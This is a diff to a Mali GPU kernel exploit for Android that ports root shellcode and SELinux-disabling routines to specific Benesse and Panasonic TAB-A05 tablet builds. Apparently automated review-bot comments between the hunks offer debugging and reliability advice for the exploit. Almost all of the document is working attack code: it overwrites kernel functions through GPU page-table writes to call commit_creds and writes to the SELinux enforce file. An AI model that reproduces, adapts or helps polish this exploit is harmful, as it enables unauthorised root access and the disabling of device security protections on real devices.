@@ -609,20 +543,20 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { int32_t immlo = (offset >> 12) & 0x3; uint32_t adpr = rd & 0x1f; adpr |= (1 << 28); - adpr |= (1 << 31); //op + adpr |= (1 << 31); // op adpr |= immlo << 29; adpr |= (immhi_mask & (immhi << 5)); return adpr; } -void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) { +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { - uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred); - //Sets x0 to init_cred + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + // Sets x0 to init_cred root_code[ADRP_INIT_INDEX] = init_adpr; root_code[ADD_INIT_INDEX] = add_init; - //Sets x8 to commit_creds - root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_handle_unknown, commit_cred); + // Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); root_code[ADD_COMMIT_INDEX] = add_commit; root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] root_code[5] = 0xd63f0100; // blr x8 
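Review bot: renaming the third parameter of fixup_root_shell from `read_handle_unknown` to `read_enforce` is misleading: every call site in select_offset still passes SEL_READ_HANDLE_UNKNOWN_*, the global it is copied into is still `sel_read_handle_unknown`, and the README log shows the code landing at page offset `d48`, which is SEL_READ_HANDLE_UNKNOWN_CTX_01_11_000 (0x364d48), not SEL_READ_ENFORCE_CTX_01_11_000 (0x364370). The adrp immediates written by `write_adrp(0, read_enforce, init_cred)` and `write_adrp(8, read_enforce, commit_cred)` are PC-relative to this address, so a future caller that trusts the name and passes the sel_read_enforce offset would emit shellcode with wrong targets; revert the rename or add a real sel_read_enforce path alongside it.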
@@ -630,6 +564,36 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_ha root_code[7] = 0xd65f03c0; // ret } +void fixup_root_shell_nop() { + + // Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = 0xD503201F; + root_code[ADD_INIT_INDEX] = 0xD503201F; + // Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = 0xD503201F; + root_code[ADD_COMMIT_INDEX] = 0xD503201F; + root_code[4] = 0xD503201F; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xD503201F; // blr x8 + root_code[6] = 0xD503201F; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xD503201F; // ret +} + +void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) { + + uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred); + // Sets x0 to init_cred + root_code_un[ADRP_INIT_INDEX] = init_adpr; + root_code_un[ADD_INIT_INDEX] = add_init; + // Sets x8 to commit_creds + root_code_un[ADRP_COMMIT_INDEX] = write_adrp(8, read_handle_unknown, commit_cred); + root_code_un[ADD_COMMIT_INDEX] = add_commit; + root_code_un[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code_un[5] = 0xd63f0100; // blr x8 + root_code_un[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code_un[7] = 0xd65f03c0; // ret +} + + uint64_t set_addr_lv3(uint64_t addr) { uint64_t pfn = addr >> PAGE_SHIFT; pfn &= ~ 0x1FFUL; @@ -672,7 +636,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - usleep(10000); + usleep(500000); } void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) { 
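Review bot: fixup_root_shell_un is a line-for-line copy of fixup_root_shell that differs only by writing root_code_un, and its sole caller is inside the commented-out `if (1)` block in select_offset; fixup_root_shell_nop fills root_code with eight `0xD503201F` (NOP) but keeps the comments `stp x29, x30, [sp, #-0x10]`, `blr x8`, `ldp x29, x30, [sp], #0x10`, `ret` and `Sets x0 to init_cred` from the real version, so the comments describe instructions that are not there. Either delete both, or give _nop honest comments and make _un take the target array as a parameter instead of duplicating the body. In the write_to hunk the per-write `usleep` goes from 10000 to 500000 with no comment; say what went wrong at 10 ms on this device, because a 50x pacing change is the kind of tuning the next porter needs to understand.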
@@ -686,7 +650,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u for (uint64_t addr = base; addr < end; addr += 0x1000) { uint64_t overwrite_addr = set_addr_lv3(addr); if (curr_overwrite_addr != overwrite_addr) { - LOG("overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset); + LOG("write_data overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset); curr_overwrite_addr = overwrite_addr; write_to(mali_fd, overwrite_addr + data_offset, value, atom_number++, type); usleep(300000); @@ -695,7 +659,10 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u } } + void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { +printf("write_func called with code_size = %llu\n", code_size); +usleep(300000); uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; uint64_t curr_overwrite_addr = 0; for (int i = 0; i < size; i++) { @@ -706,7 +673,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u for (uint64_t addr = base; addr < end; addr += 0x1000) { uint64_t overwrite_addr = set_addr_lv3(addr); if (curr_overwrite_addr != overwrite_addr) { - LOG("overwrite addr : %llx %llx\n", overwrite_addr + func_offset, func_offset); + LOG("write_func overwrite addr : %llx %llx\n", overwrite_addr + func_offset, func_offset); curr_overwrite_addr = overwrite_addr; for (int code = code_size - 1; code >= 0; code--) { write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); 
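Review bot: the new `printf` and `usleep(300000)` at the top of write_func are unindented and bypass LOG, and that 300 ms sits on top of the 500 ms now inside every write_to call: with code_size 8 and the two overwritten pages shown in the README log, write_func alone sleeps about eight seconds per run, which matters when the README tells users to retry many times. Put a comment on why the writes need pacing (the GPU job has to complete before the next write is queued) and consider polling for completion instead of a fixed sleep. Renaming the LOG prefixes to `write_data overwrite addr` / `write_func overwrite addr` is a good change and makes the README log readable; keep that.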
@@ -716,24 +683,45 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u } } } -/* + int run_enforce() { char result = '2'; + printf("run_enforce: before sleep\n"); sleep(3); + printf("run_enforce: after sleep\n"); int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + printf("run_enforce: open\n"); read(enforce_fd, &result, 1); close(enforce_fd); LOG("result %d\n", result); return result; } -*/ -int run_enforce() { + +int run_enforce_write() { + char result = '0'; + sleep(3); + LOG("run_enforce_write before open %d\n", result); + int enforce_fd = open("/sys/fs/selinux/enforce", O_WRONLY); + LOG("run_enforce_write before write\n"); + write(enforce_fd, &result, 1); + LOG("run_enforce_write before close\n"); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + +int run_enforce_un() { char result = '2'; + printf("run_enforce_un: before sleep\n"); sleep(3); - int enforce_fd = open("/sys/fs/selinux/reject_unknown", O_RDONLY); + printf("run_enforce_un: after sleep\n"); + int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY); + printf("run_enforce_un: open\n"); read(enforce_fd, &result, 1); + printf("run_enforce_un: after read\n"); close(enforce_fd); + printf("run_enforce_un: after close\n"); LOG("result %d\n", result); return result; } 
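Review bot: none of run_enforce, run_enforce_write and run_enforce_un checks the return value of open(): on failure `read(-1, &result, 1)` fails silently, `result` stays '2' and the function logs `result 50`, which the README's user will read as "not yet, retry". Check `enforce_fd < 0` and log errno. run_enforce_write writes '0' to /sys/fs/selinux/enforce but returns the byte it tried to write rather than re-reading the file, so its return value says nothing about whether SELinux is now permissive; return the write() result or the re-read value. Switching the probe from reject_unknown to deny_unknown is fine (both sysfs nodes are served by sel_read_handle_unknown, the function the shellcode overwrites), but that is the whole reason a read of this file runs the payload and it deserves a comment. The `before sleep` / `after sleep` / `open` / `after read` / `after close` traces are stdout `printf` rather than LOG; drop them now that the 01.11.000 run works, or use LOG.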
@@ -744,167 +732,82 @@ void select_offset() { int len = __system_property_get("ro.build.fingerprint", fingerprint); LOG("fingerprint: %s\n", fingerprint); - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7212/1333N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7212_1333; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7212_1333; - fixup_root_shell(INIT_CRED_7212_1333, COMMIT_CREDS_7212_1333, SEL_READ_HANDLE_UNKNOWN_7212_1333, ADD_INIT_7212_1333, ADD_COMMIT_7212_1333); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7216/1582N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7216_1582; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7216_1582; - fixup_root_shell(INIT_CRED_7216_1582, COMMIT_CREDS_7216_1582, SEL_READ_HANDLE_UNKNOWN_7216_1582, ADD_INIT_7216_1582, ADD_COMMIT_7216_1582); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7224/1752N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7224_1752; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7224_1752; - fixup_root_shell(INIT_CRED_7224_1752, COMMIT_CREDS_7224_1752, SEL_READ_HANDLE_UNKNOWN_7224_1752, ADD_INIT_7224_1752, ADD_COMMIT_7224_1752); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1853N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7229_1853; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1853; - fixup_root_shell(INIT_CRED_7229_1853, COMMIT_CREDS_7229_1853, SEL_READ_HANDLE_UNKNOWN_7229_1853, ADD_INIT_7229_1853, ADD_COMMIT_7229_1853); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1856N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7229_1856; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1856; - fixup_root_shell(INIT_CRED_7229_1856, COMMIT_CREDS_7229_1856, SEL_READ_HANDLE_UNKNOWN_7229_1856, ADD_INIT_7229_1856, ADD_COMMIT_7229_1856); + if (!strcmp(fingerprint, 
"benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_01_00_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000; + fixup_root_shell(INIT_CRED_CTX_01_00_000, COMMIT_CREDS_CTX_01_00_000, SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000, ADD_INIT_CTX_01_00_000, ADD_COMMIT_CTX_01_00_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2039N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7234_2039; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2039; - fixup_root_shell(INIT_CRED_7234_2039, COMMIT_CREDS_7234_2039, SEL_READ_HANDLE_UNKNOWN_7234_2039, ADD_INIT_7234_2039, ADD_COMMIT_7234_2039); + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.01.001/01.01.001:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_01_01_001; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_01_001; + fixup_root_shell(INIT_CRED_CTX_01_01_001, COMMIT_CREDS_CTX_01_01_001, SEL_READ_HANDLE_UNKNOWN_CTX_01_01_001, ADD_INIT_CTX_01_01_001, ADD_COMMIT_CTX_01_01_001); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2042N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7234_2042; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2042; - fixup_root_shell(INIT_CRED_7234_2042, COMMIT_CREDS_7234_2042, SEL_READ_HANDLE_UNKNOWN_7234_2042, ADD_INIT_7234_2042, ADD_COMMIT_7234_2042); + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.04.000/01.04.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_01_04_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_04_000; + fixup_root_shell(INIT_CRED_CTX_01_04_000, COMMIT_CREDS_CTX_01_04_000, SEL_READ_HANDLE_UNKNOWN_CTX_01_04_000, ADD_INIT_CTX_01_04_000, ADD_COMMIT_CTX_01_04_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2216N:user/amz-p,release-keys")) { - selinux_enforcing = 
SELINUX_ENFORCING_7242_2216; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2216; - fixup_root_shell(INIT_CRED_7242_2216, COMMIT_CREDS_7242_2216, SEL_READ_HANDLE_UNKNOWN_7242_2216, ADD_INIT_7242_2216, ADD_COMMIT_7242_2216); + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.11.000/01.11.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_01_11_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_11_000; + fixup_root_shell(INIT_CRED_CTX_01_11_000, COMMIT_CREDS_CTX_01_11_000, SEL_READ_HANDLE_UNKNOWN_CTX_01_11_000, ADD_INIT_CTX_01_11_000, ADD_COMMIT_CTX_01_11_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2896N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_2896; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2896; - fixup_root_shell(INIT_CRED_7242_2896, COMMIT_CREDS_7242_2896, SEL_READ_HANDLE_UNKNOWN_7242_2896, ADD_INIT_7242_2896, ADD_COMMIT_7242_2896); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_00_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000; + fixup_root_shell(INIT_CRED_CTZ_01_00_000, COMMIT_CREDS_CTZ_01_00_000, SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000, ADD_INIT_CTZ_01_00_000, ADD_COMMIT_CTZ_01_00_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2906N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_2906; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2906; - fixup_root_shell(INIT_CRED_7242_2906, COMMIT_CREDS_7242_2906, SEL_READ_HANDLE_UNKNOWN_7242_2906, ADD_INIT_7242_2906, ADD_COMMIT_7242_2906); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.01.000/01.01.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_01_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_01_000; + 
fixup_root_shell(INIT_CRED_CTZ_01_01_000, COMMIT_CREDS_CTZ_01_01_000, SEL_READ_HANDLE_UNKNOWN_CTZ_01_01_000, ADD_INIT_CTZ_01_01_000, ADD_COMMIT_CTZ_01_01_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3515N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_3515; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3515; - fixup_root_shell(INIT_CRED_7242_3515, COMMIT_CREDS_7242_3515, SEL_READ_HANDLE_UNKNOWN_7242_3515, ADD_INIT_7242_3515, ADD_COMMIT_7242_3515); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.004/01.02.004:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_02_004; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004; + fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3516N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_3516; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3516; - fixup_root_shell(INIT_CRED_7242_3516, COMMIT_CREDS_7242_3516, SEL_READ_HANDLE_UNKNOWN_7242_3516, ADD_INIT_7242_3516, ADD_COMMIT_7242_3516); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_02_005; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005; + fixup_root_shell(INIT_CRED_CTZ_01_02_005, COMMIT_CREDS_CTZ_01_02_005, SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005, ADD_INIT_CTZ_01_02_005, ADD_COMMIT_CTZ_01_02_005); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7273/2625N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7273_2625; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7273_2625; - fixup_root_shell(INIT_CRED_7273_2625, COMMIT_CREDS_7273_2625, SEL_READ_HANDLE_UNKNOWN_7273_2625, ADD_INIT_7273_2625, 
ADD_COMMIT_7273_2625); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.03.000/01.03.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_03_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_03_000; + fixup_root_shell(INIT_CRED_CTZ_01_03_000, COMMIT_CREDS_CTZ_01_03_000, SEL_READ_HANDLE_UNKNOWN_CTZ_01_03_000, ADD_INIT_CTZ_01_03_000, ADD_COMMIT_CTZ_01_03_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7279.2766N/0023253929472:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7279_2766; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7279_2766; - fixup_root_shell(INIT_CRED_7279_2766, COMMIT_CREDS_7279_2766, SEL_READ_HANDLE_UNKNOWN_7279_2766, ADD_INIT_7279_2766, ADD_COMMIT_7279_2766); + /* + if (1) { + //avc_deny = 0x321C64; // avc_denied.isra.6 + //selinux_enforcing_READ = 0x32CC2C ; // t sel_read_enforce + //selinux_enforcing_WRITE = 0x32E01C ; // t sel_read_enforce + selinux_enforcing = SELINUX_ENFORCING_neo; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo; + //fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_WRITE, 0x910FC000, 0x910CA108); + //fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_READ, 0x910FC000, 0x910CA108); + fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_handle_unknown, ADD_INIT_neo, ADD_COMMIT_neo); return; } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2877N/0023723719936:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7285_2877; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2877; - fixup_root_shell(INIT_CRED_7285_2877, COMMIT_CREDS_7285_2877, SEL_READ_HANDLE_UNKNOWN_7285_2877, ADD_INIT_7285_2877, ADD_COMMIT_7285_2877); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2880N/0023723720704:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7285_2880; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2880; - 
fixup_root_shell(INIT_CRED_7285_2880, COMMIT_CREDS_7285_2880, SEL_READ_HANDLE_UNKNOWN_7285_2880, ADD_INIT_7285_2880, ADD_COMMIT_7285_2880); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2982N/0024126400000:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7292_2982; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2982; - fixup_root_shell(INIT_CRED_7292_2982, COMMIT_CREDS_7292_2982, SEL_READ_HANDLE_UNKNOWN_7292_2982, ADD_INIT_7292_2982, ADD_COMMIT_7292_2982); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2984N/0024126400512:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7292_2984; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2984; - fixup_root_shell(INIT_CRED_7292_2984, COMMIT_CREDS_7292_2984, SEL_READ_HANDLE_UNKNOWN_7292_2984, ADD_INIT_7292_2984, ADD_COMMIT_7292_2984); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7603.3110N/0025065956864:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7603_3110; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7603_3110; - fixup_root_shell(INIT_CRED_7603_3110, COMMIT_CREDS_7603_3110, SEL_READ_HANDLE_UNKNOWN_7603_3110, ADD_INIT_7603_3110, ADD_COMMIT_7603_3110); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7608.3614N/0025468739072:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7608_3614; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7608_3614; - fixup_root_shell(INIT_CRED_7608_3614, COMMIT_CREDS_7608_3614, SEL_READ_HANDLE_UNKNOWN_7608_3614, ADD_INIT_7608_3614, ADD_COMMIT_7608_3614); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7614.3227N/0025938402048:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7614_3227; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7614_3227; - fixup_root_shell(INIT_CRED_7614_3227, COMMIT_CREDS_7614_3227, SEL_READ_HANDLE_UNKNOWN_7614_3227, 
ADD_INIT_7614_3227, ADD_COMMIT_7614_3227); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7624_3337; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7624_3337; - fixup_root_shell(INIT_CRED_7624_3337, COMMIT_CREDS_7624_3337, SEL_READ_HANDLE_UNKNOWN_7624_3337, ADD_INIT_7624_3337, ADD_COMMIT_7624_3337); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7633.3445N/0027347744000:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7633_3445; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7633_3445; - fixup_root_shell(INIT_CRED_7633_3445, COMMIT_CREDS_7633_3445, SEL_READ_HANDLE_UNKNOWN_7633_3445, ADD_INIT_7633_3445, ADD_COMMIT_7633_3445); - return; - } - + */ err(1, "unable to match build id\n"); } @@ -916,14 +819,13 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) uint64_t selinux_enforcing_addr = (((selinux_enforcing + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - usleep(100000); + usleep(300000); //Go through the reserve pages addresses to write to avc_denied with our own shellcode write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { -/* - uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; +/* uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); usleep(100000); 
@@ -932,14 +834,26 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved //Triggers avc_denied to disable SELinux open("/dev/kmsg", O_RDONLY); -*/ - uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + */ + //uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; + //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + //printf("sel_read_enforce_addr is %llx avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr); + + uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - //Call commit_creds to overwrite process credentials to gain root - write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); + //uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; + //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + + // Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t)); + //write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); + //write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); } + void spray(int mali_fd) { for (int j = 0; j < 
SPRAY_NUM; j++) { union kbase_ioctl_mem_alloc alloc = {0}; @@ -973,7 +887,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { err(1, "gpu_alloc_region mmap failed"); } uint64_t jit_pages = SPRAY_PAGES; - uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region); + uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region); atom_number++; mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0); @@ -995,7 +909,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { release_mem_pool(mali_fd, drain); printf("release_mem_pool\n"); jit_free(mali_fd, atom_number, jit_id); - + printf("reserve pages here\n"); reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); LOG("jit_freed\n"); @@ -1009,8 +923,13 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { LOG("Found pgd %d, %llx\n", pgd_idx, pgd); atom_number++; write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0])); + usleep(100000); write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + usleep(100000); + printf("time to run_enforce\n"); run_enforce(); + run_enforce_un(); + //run_enforce_write(); cleanup(mali_fd, pgd); return 0; } diff --git a/midgard.h b/midgard.h index e0ce432..d05cf25 100644 --- a/midgard.h +++ b/midgard.h @@ -1,7 +1,7 @@ #ifndef MIDGARD_H #define MIDGARD_H -//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone +// Generated using pandecode-standalone: 